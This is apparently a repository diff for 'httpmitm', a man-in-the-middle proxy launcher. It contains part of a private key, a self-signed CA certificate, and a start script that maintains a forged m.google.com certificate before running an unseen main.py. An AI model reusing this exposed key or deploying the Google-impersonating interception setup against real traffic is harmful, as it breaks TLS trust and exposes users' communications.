6OdwdauMoE4ZHQtQfY++PSoBD2MkQ3gYcd0X4UfMFpby9tSzo4opgecej9MC+Bp0
NYK/3z9vAgMBAAECggEAB5gTAnsxOeyU/8w4ytq7JUQ3EeTJ/tFPy8cV67RVv4pR
MdcXuSibXSIkGjOQ1UKZQJaaMHhYEOjvcYYnxyBim5lmGde74c7ffa5sOxADhkcw
G8pxh0qReOVliNl3jsKCcH8Su/x0bNXrSKZ0dTJqFYw5PM4dT05RblnGUfToMmQ1
z4Hp8iM8rEDePFz1x/nsTvbp4UAVW3B2gj1ZEN2pMS+nXIFyZ70KQqUThejxx2zN
841hLtm/heHBThWqbCrqaMUJORaD1gfJO0P+cNUPiKmpDExgqlwps16POkb18CDA
KYPX/Ug8YRwFn5I4e1ATT/sToGOuqeIUalY3AezKYQKBgQDRLML/+yVpqMlfiPl6
Kt94kBQfC5h0DWdtOUB4Ze3Gt1sypb06XaiYCzq7NEUpppksvZmeBIK4eXeTH05q
vni7DzU6AX8VdyJxaDWKmfXaNJ91Em5E26eQdrta4lzitWm2cEtsoAGIurNXTdkK
J45cStdtkKK/uGLqOP4LXGrpiQKBgQDHLt7HAXsH7H7CCDqlolUevU59kcKpTBs8
phGyOrJTOrCa5Jnk/AqXwc9BDd5fHKgB0OSCzJBuLjJBGzKCX61lMbvjA40s2CCU
DbXmD6Jx7pcOcIvegSgIXBRCk4wkbEgRf6G1hcB3IMHz1VlkSWYprelLOJhEjVMy
NKJXZdC7NwKBgHQwC+TKaP6mraxuVj0g4V6DkVmpRDZ6V4/Y9FGsNIZjxLl+THzG
F2bVHftsTlqTWpP6gQC/+qhjeCL1icZLJJ6rFOKygBe5RB2AR/VEDcb14fjSkwOW
ix34hZs3D2cyY5TeDVc6DYAYTJPa/wrf6/ih7cXDSFN8JR17KMnAvPYZAoGAI8i5
4UrUzaGhTD6qOqOlYzZjaY/MRxoTMpwrRbfh3a4HmGxFcawOQyFgmLFjJ/c//8OF
qjISKJlIEgZO1rlVr3514Nz8efgCMlccPM7GQm242bFCj6Dojkfso+FaJhkGAY7K
gJAc+cn6zlGgE7JUFlzWMttiD77MGZL3L3htPZUCgYB/WydEVqsUk+VXEQ+gXMe1
WQW7u1xwAr/VHkI+bKLR8XJkXHo2hVNgAB7/tIom5xLOWeuG5rcksOeir7seV5gL
l0LPBoBuPqdu+M2PKUMzIdjUMbM86rbwilT8tAETkN+9zwxB/NRaQ/aQVKXRn+fW
ng+pvpB+l0Ich6lyJg8mFg==
-----END PRIVATE KEY-----

22
myCA.pem Normal file
View File

@ -0,0 +1,22 @@
-----BEGIN CERTIFICATE-----
MIIDszCCApugAwIBAgIUTAB/jZt1qmBEtW6IclSJZe7g+vYwDQYJKoZIhvcNAQEL
BQAwaTELMAkGA1UEBhMCVVMxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEiMCAGCSqGSIb3DQEJARYTa3h0em93
bnN1QGdtYWlsLmNvbTAeFw0yNTAzMDkxOTU0MDNaFw0zMDAzMDkxOTU0MDNaMGkx
CzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRl
cm5ldCBXaWRnaXRzIFB0eSBMdGQxIjAgBgkqhkiG9w0BCQEWE2t4dHpvd25zdUBn
bWFpbC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCiwBenclR6
YAO3GlX7RaaXo0Wo7Lx+LxlfgjwsY+jiXtOk8TrJ8qY8ZpIHARdXhKWv9NjpRjKr
Mm0JAfNh9cO5WGC1+3TT3J0YcADLR7WEqfk3ogPUJDqOOHW5Qtap8l8ET/eMvZCZ
j9UEqolDYTdqgtQNVxK0H4nZwnEo9KCsfi4ENegkaBZ1boNy/7sWWPJ1VfUy3hh0
SLqBtzxklDf8f2AOAfoc4GSD0RLGyEJORSXhUHs/fSpOsqJ9DfHKtqqGNhgB2EQH
kfyB6OdwdauMoE4ZHQtQfY++PSoBD2MkQ3gYcd0X4UfMFpby9tSzo4opgecej9MC
+Bp0NYK/3z9vAgMBAAGjUzBRMB0GA1UdDgQWBBRfbeS/lOJspNr8mDiBLRcOKOO5
WTAfBgNVHSMEGDAWgBRfbeS/lOJspNr8mDiBLRcOKOO5WTAPBgNVHRMBAf8EBTAD
AQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAqGU8bDt2L8Pc0x1B/j3LmaWCXLHa7TBcY
8XcN/pdZEpXjo6ZHQwudzbpoCQxOWXlC9Lu1CQ4ALzh/BeCyUs2EHj7MSposzGR4
QqNZm9Ik0ZLd7WclzLYegBsKOk0tBCJ2bDJieCqWNRmcJO1Na/X7eDb+ZkTdvUDB
PAQi1FrJrlq4nyVonzcSX0mZh2KOwt4YG/2D8aini+UWcyR2DuWM5J1tlvBpc0cM
5PGy60QzsK/qcl/lLOk8xDCap3oE2rcD9UzBVhZLDXAG91pDJW91Oc0STckg2XQK
w4dKdwgDvcvUcM6UBTwy3ZkMxTmWfaBzxNWI8Z11bS7eDWzupl1H
-----END CERTIFICATE-----

47
start.sh Normal file
View File

@ -0,0 +1,47 @@
#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
SCRIPT_DIR=${SCRIPT_DIR:-"."}
VERSION=1.0.0
cat <<EOF
httpmitm - "rewritten" by kxtz!
v$VERSION-g$(git log -n 1 --pretty=format:%h -- $SCRIPT_DIR)
--------------------------------
EOF
CERT_PATH="${SCRIPT_DIR}/certs/google.com.pem"
CA_PATH="${SCRIPT_DIR}/myCA"
if [[ ! -f "$CA_PATH.pem" || ! -f "$CA_PATH.key" ]]; then
echo "CA certificates missing!"
echo "checked path: $CA_PATH.(pem/key)"
exit 1
fi
if [[ ! -f "$CERT_PATH" ]]; then
echo "m.google.com certificate missing!"
echo "checked path: $CERT_PATH"
exit 1
fi
EXPIRY_DATE=$(openssl x509 -enddate -noout -in "$CERT_PATH" | cut -d= -f2)
EXPIRY_TIMESTAMP=$(date -d "$EXPIRY_DATE" +%s)
CURRENT_TIMESTAMP=$(date +%s)
if [[ "$EXPIRY_TIMESTAMP" -lt "$CURRENT_TIMESTAMP" ]]; then
echo "Certificate expired. Regenerating..."
bash "${SCRIPT_DIR}/generate_certs.sh"
mv "${SCRIPT_DIR}/google.com.pem" "${SCRIPT_DIR}/certs/google.com.pem"
mv "${SCRIPT_DIR}/google.com.key" "${SCRIPT_DIR}/certs/google.com.key"
mv "${SCRIPT_DIR}/extfile" "${SCRIPT_DIR}/certs"
mv "${SCRIPT_DIR}/in.csr" "${SCRIPT_DIR}/certs"
fi
cd $SCRIPT_DIR
if [ ! -e ".venv" ]
then
python3 -m venv .venv
fi
source $SCRIPT_DIR/.venv/bin/activate
pip3 install requests protobuf
python3 main.py